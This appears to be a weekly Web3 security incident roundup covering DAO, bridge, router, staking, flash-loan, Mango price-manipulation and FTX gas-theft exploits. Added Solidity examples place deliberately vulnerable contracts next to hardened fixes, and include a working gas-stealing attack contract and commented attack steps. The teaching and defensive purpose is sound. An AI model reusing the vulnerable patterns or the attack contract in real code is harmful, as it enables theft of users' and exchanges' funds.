Last week one attacker turned $10 million of starting capital into "leverage" over hundreds of millions of dollars in the Solana ecosystem, and another freeloaded on an exchange's gas to mint tokens at its expense. Meanwhile, several Web3 projects suffered private-key leaks and flash-loan attacks.
According to monitoring by the Beosin EagleEye Web3 security early-warning and monitoring platform, as of press time a total of 8 attack-related security incidents occurred last week, with cumulative losses of roughly $120 million.
October 9
1. The XaveFinance project was attacked, resulting in a 1,000-fold increase in the RNBW supply
On October 9, the XaveFinance project was attacked, resulting in a 1,000-fold increase in the RNBW supply. The attacker called the executeProposalWithIndex() function of the DaoModule contract to execute a malicious proposal of the attacker's own creation; the proposal minted 100,000,000,000,000 RNBW and transferred ownership of the contract to the attacker. The attacker finally redeemed the minted RNBW for xRNBW.
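The lesson of this incident is that a proposal-execution entry point must verify that the proposal was actually approved before it runs with the DAO's authority. The following is an added illustration, not Xave Finance's code: a hypothetical owner-minted token plus two versions of a DaoModule-style executor. All contract and function names other than executeProposalWithIndex() are assumptions; the attack path in the trailing comment mirrors the steps described above.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Hypothetical token with an owner-only mint, standing in for an RNBW-style
// token. Names and layout are assumptions, not Xave's code.
contract MintableToken {
    address public owner;
    mapping(address => uint256) public balanceOf;
    uint256 public totalSupply;

    constructor(address _owner) { owner = _owner; }

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    function mint(address to, uint256 amount) external onlyOwner {
        totalSupply += amount;
        balanceOf[to] += amount;
    }

    function transferOwnership(address newOwner) external onlyOwner {
        owner = newOwner;
    }
}

// Vulnerable pattern: anyone can store a proposal and anyone can execute it;
// nothing checks that the proposal was ever approved, so an attacker's own
// mint-and-transfer-ownership proposal runs with the DAO's authority.
contract DaoModuleVulnerable {
    struct Proposal { address target; bytes data; }
    Proposal[] public proposals;

    function propose(address target, bytes calldata data) external returns (uint256 index) {
        proposals.push(Proposal(target, data));
        return proposals.length - 1;
    }

    function executeProposalWithIndex(uint256 index) external {
        Proposal memory p = proposals[index];
        (bool ok, ) = p.target.call(p.data);   // executed as this contract
        require(ok, "call failed");
    }
}

// Hardened pattern: execution requires an approval recorded by a trusted
// approver (the vote contract or oracle), a timelock after approval, and
// one-shot execution with the state change made before the external call.
contract DaoModuleHardened {
    struct Proposal { address target; bytes data; uint256 approvedAt; bool executed; }
    Proposal[] public proposals;
    address public immutable approver;          // e.g. the governance vote contract
    uint256 public constant TIMELOCK = 2 days;

    constructor(address _approver) { approver = _approver; }

    function propose(address target, bytes calldata data) external returns (uint256 index) {
        proposals.push(Proposal(target, data, 0, false));
        return proposals.length - 1;
    }

    function approve(uint256 index) external {
        require(msg.sender == approver, "not approver");
        require(proposals[index].approvedAt == 0, "already approved");
        proposals[index].approvedAt = block.timestamp;
    }

    function executeProposalWithIndex(uint256 index) external {
        Proposal storage p = proposals[index];
        require(p.approvedAt != 0, "not approved");
        require(block.timestamp >= p.approvedAt + TIMELOCK, "timelock active");
        require(!p.executed, "already executed");
        p.executed = true;                      // effects before interaction
        bytes memory data = p.data;
        (bool ok, ) = p.target.call(data);
        require(ok, "call failed");
    }
}

// Attack path against the vulnerable module, following the incident above
// (token.owner is the vulnerable module; amounts are illustrative):
//   bytes memory data = abi.encodeCall(MintableToken.mint, (attacker, 1e14 * 1e18));
//   uint256 i = vulnerable.propose(address(token), data);
//   vulnerable.executeProposalWithIndex(i);   // mints to the attacker at once
```

The hardened version still needs a trustworthy approver: if approval comes from an oracle anyone can answer, or the timelock is set to seconds, the checks are formally present but give defenders no window to react.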
2. Rugpull in the Jumpnfinance project, involving about $1.15 million
The Jumpnfinance project rug-pulled. The attacker called the 0x6b1d9018() function of the 0xe156 contract to withdraw users' assets from the contract to the attacker's address. So far, 2,100 BNB (about $581,700) of the stolen funds have been transferred to Tornado.Cash, and the remaining 2,058 BNB (about $571,128) remain at the attacker's address.
October 11
1. The QANplatform cross-chain bridge was attacked; the project's private key is suspected to have been leaked, involving about $1.89 million
The originating address of the exploit transaction is suspected to belong to the project team. From that address, the attacker called the bridgeWithdraw function of the cross-chain bridge contract to withdraw QANX tokens, then swapped the QANX for the platform's native tokens. The stolen funds currently remain at the attacker's address.
2. The Rabby project was exploited; revoke approvals granted to the affected contract
The incident stems from an unchecked external call in the _swap function of RabbyRouter: anyone can call the function and have the router transfer tokens that users had approved to it. Attackers have so far exploited it on Ethereum, BSC, Polygon, Avalanche, Fantom, Optimism, and Arbitrum; users should revoke approvals granted to the affected contract on each chain.
3. The TempleDAO project was exploited, involving about $2.36 million
The migrateStake function of the StaxLPStaking contract lacks a permission check, so anyone can call it to withdraw the StaxLP held in the contract. After the exploit, the attacker swapped all the StaxLP tokens obtained for ETH.
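The Rabby and TempleDAO incidents are two faces of the same mistake: a function that moves funds belonging to other users is reachable by anyone. The following added example (not the code of either project) sketches both shapes with hypothetical contracts: a staking contract whose migrate function has no caller check, and a router that forwards caller-supplied calldata while holding user approvals, each beside a hardened version. All names except migrateStake are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
}

// --- Pattern 1: a fund-moving function with no caller check (TempleDAO class) ---

contract StakingVulnerable {
    IERC20 public immutable lpToken;
    mapping(address => uint256) public stakeOf;

    constructor(IERC20 _lp) { lpToken = _lp; }

    function stake(uint256 amount) external {
        require(lpToken.transferFrom(msg.sender, address(this), amount), "transfer failed");
        stakeOf[msg.sender] += amount;
    }

    // Anyone can call this for any account: it checks neither who the caller
    // is nor that `account` holds `amount`, so the contract's entire LP
    // balance can be pulled out in one call.
    function migrateStake(address account, uint256 amount) external {
        stakeOf[account] = 0;
        require(lpToken.transfer(msg.sender, amount), "transfer failed");
    }
}

contract StakingHardened {
    IERC20 public immutable lpToken;
    address public immutable migrator;          // the only contract allowed to migrate
    mapping(address => uint256) public stakeOf;

    constructor(IERC20 _lp, address _migrator) { lpToken = _lp; migrator = _migrator; }

    function stake(uint256 amount) external {
        require(lpToken.transferFrom(msg.sender, address(this), amount), "transfer failed");
        stakeOf[msg.sender] += amount;
    }

    // Only the designated migrator may call, and it can move no more than the
    // account's own recorded stake.
    function migrateStake(address account, uint256 amount) external {
        require(msg.sender == migrator, "not migrator");
        require(stakeOf[account] >= amount, "insufficient stake");
        stakeOf[account] -= amount;
        require(lpToken.transfer(migrator, amount), "transfer failed");
    }
}

// --- Pattern 2: arbitrary external call from a contract holding user
//     approvals (Rabby class) ---

contract RouterVulnerable {
    // The caller picks both target and calldata. Because users approved this
    // router, `target` can be a token and `data` can encode
    // transferFrom(victim, attacker, amount), executed as the router.
    function swap(address target, bytes calldata data) external {
        (bool ok, ) = target.call(data);
        require(ok, "swap failed");
    }
}

contract RouterHardened {
    mapping(address => bool) public allowedDex;   // audited DEX routers only
    address public immutable owner;

    constructor() { owner = msg.sender; }

    function setAllowed(address dex, bool ok) external {
        require(msg.sender == owner, "not owner");
        allowedDex[dex] = ok;
    }

    // The router spends only the caller's own approved tokens, pulls them in
    // explicitly, and forwards calls only to allow-listed targets, so no call
    // path can reach transferFrom on another user's approval.
    function swap(IERC20 tokenIn, uint256 amountIn, address dex, bytes calldata data) external {
        require(allowedDex[dex], "target not allowed");
        require(tokenIn.transferFrom(msg.sender, address(this), amountIn), "pull failed");
        (bool ok, ) = dex.call(data);
        require(ok, "swap failed");
    }
}
```

For users the practical check is the same in both cases: any contract that holds an open approval and exposes an unrestricted call or withdrawal can spend that approval, so revoke approvals to a compromised contract on every chain it was deployed on, not just the one where the first exploit transaction appeared.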
October 12
1. The Journey of Awakening (ATK) project suffered a flash-loan attack
The attacker used a flash loan to attack the ATK project's strategy contract, extracting a large amount of ATK tokens from it, and then swapped all of the ATK obtained for about $120,000 worth of BSC-USD.
2. Mango, the Solana decentralized trading platform, was exploited, with losses of up to $116 million
The attacker used two accounts with a combined starting capital of 10 million USDT.
Step 1: the attacker deposited 5 million USDC into Mango.
Step 2: the attacker opened a 483 million MNGO position via PlacePerpOrder2 in the MNGO-PERP market.
Step 3: using a separate account (Account 2) to trade against that position, the attacker pushed the MNGO price from $0.0382 to $0.91.
Account 2 then showed 483 million × ($0.91 − $0.03298) ≈ $423 million of unrealized profit, which counted as collateral and allowed the attacker to borrow $116 million from the platform.
October 13
1. FTX exchange hit by gas theft
The FTX exchange was the victim of gas theft: the attacker used gas paid by FTX to mint a large quantity of XEN tokens. The attacker repeatedly withdrew small amounts of ETH from FTX to an attack contract. Each withdrawal is a transaction sent by the FTX hot wallet to the attack contract, which triggers the contract's fallback() function; from there the attack contract sends a mint request to the XEN contract. XEN mints at no cost beyond transaction gas and only requires a lock-up term to be passed in. Because the initiator of each transaction is the FTX hot wallet address, all gas for the entire call chain is paid by the FTX hot wallet, while the XEN mint is credited to the attacker's address, which achieves the attacker's goal.
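To make the mechanism concrete, here is an added illustration (not XEN's or FTX's code) of the three parties: a hypothetical free-mint token with a claimRank(term) entry point, a receiver contract whose receive() spends the transaction sender's gas on mints, and a payout contract showing the defender-side control, a bounded gas budget for the recipient. The loop that spawns one child contract per rank is this example's construction; the page only states that the fallback triggers the mint. All names are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Minimal stand-in for a mint-by-lockup token: claimRank(term) costs only gas,
// records msg.sender, and mints to that address once the term has elapsed.
// Assumed interface, not XEN's actual code.
contract FreeMintToken {
    mapping(address => uint256) public maturesAt;
    mapping(address => uint256) public balanceOf;

    function claimRank(uint256 termDays) external {
        require(termDays > 0 && maturesAt[msg.sender] == 0, "bad claim");
        maturesAt[msg.sender] = block.timestamp + termDays * 1 days;
    }

    function claimMintReward() external {
        require(maturesAt[msg.sender] != 0 && block.timestamp >= maturesAt[msg.sender], "not matured");
        maturesAt[msg.sender] = 0;
        balanceOf[msg.sender] += 1000e18;       // illustrative reward
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}

// One claim per address, so each rank needs a fresh contract address.
contract Minter {
    FreeMintToken public immutable token;
    address public immutable attacker;

    constructor(FreeMintToken _token, address _attacker) {
        token = _token;
        attacker = _attacker;
        _token.claimRank(1);                    // recorded under this contract's address
    }

    function harvest() external {
        require(msg.sender == attacker, "not attacker");
        token.claimMintReward();
        token.transfer(attacker, token.balanceOf(address(this)));
    }
}

// The attack contract: every incoming withdrawal from the exchange hot wallet
// triggers receive(). The hot wallet is the transaction sender and pays for
// all gas, so the loop runs until the budget it supplied runs low.
contract GasThief {
    FreeMintToken public immutable token;
    address public immutable attacker;
    Minter[] public minters;

    constructor(FreeMintToken _token) { token = _token; attacker = msg.sender; }

    receive() external payable {
        while (gasleft() > 200_000) {
            minters.push(new Minter(token, attacker));
        }
    }
}

// Defender side: a payout contract that never hands the recipient an open-ended
// gas budget. A plain EOA needs nothing beyond the base cost; a contract
// recipient gets a small fixed stipend, so the receive() above cannot afford
// even one CREATE and the attacker mints nothing on the exchange's dime.
contract BoundedPayout {
    address public immutable operator;
    uint256 public constant RECIPIENT_GAS = 50_000;

    constructor() { operator = msg.sender; }
    receive() external payable {}

    function withdrawTo(address payable to, uint256 amount) external {
        require(msg.sender == operator, "not operator");
        (bool ok, ) = to.call{value: amount, gas: RECIPIENT_GAS}("");
        require(ok, "payout failed");
    }
}
```

For a hot wallet that sends withdrawals as plain EOA transactions the equivalent control is the transaction gas limit: set it to the 21,000 base cost unless the destination is a known contract, and alert on withdrawals whose gas used is orders of magnitude above the value transferred, which is exactly the pattern of repeated small withdrawals described above.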
The above data comes from the Beosin EagleEye Web3 security warning and monitoring platform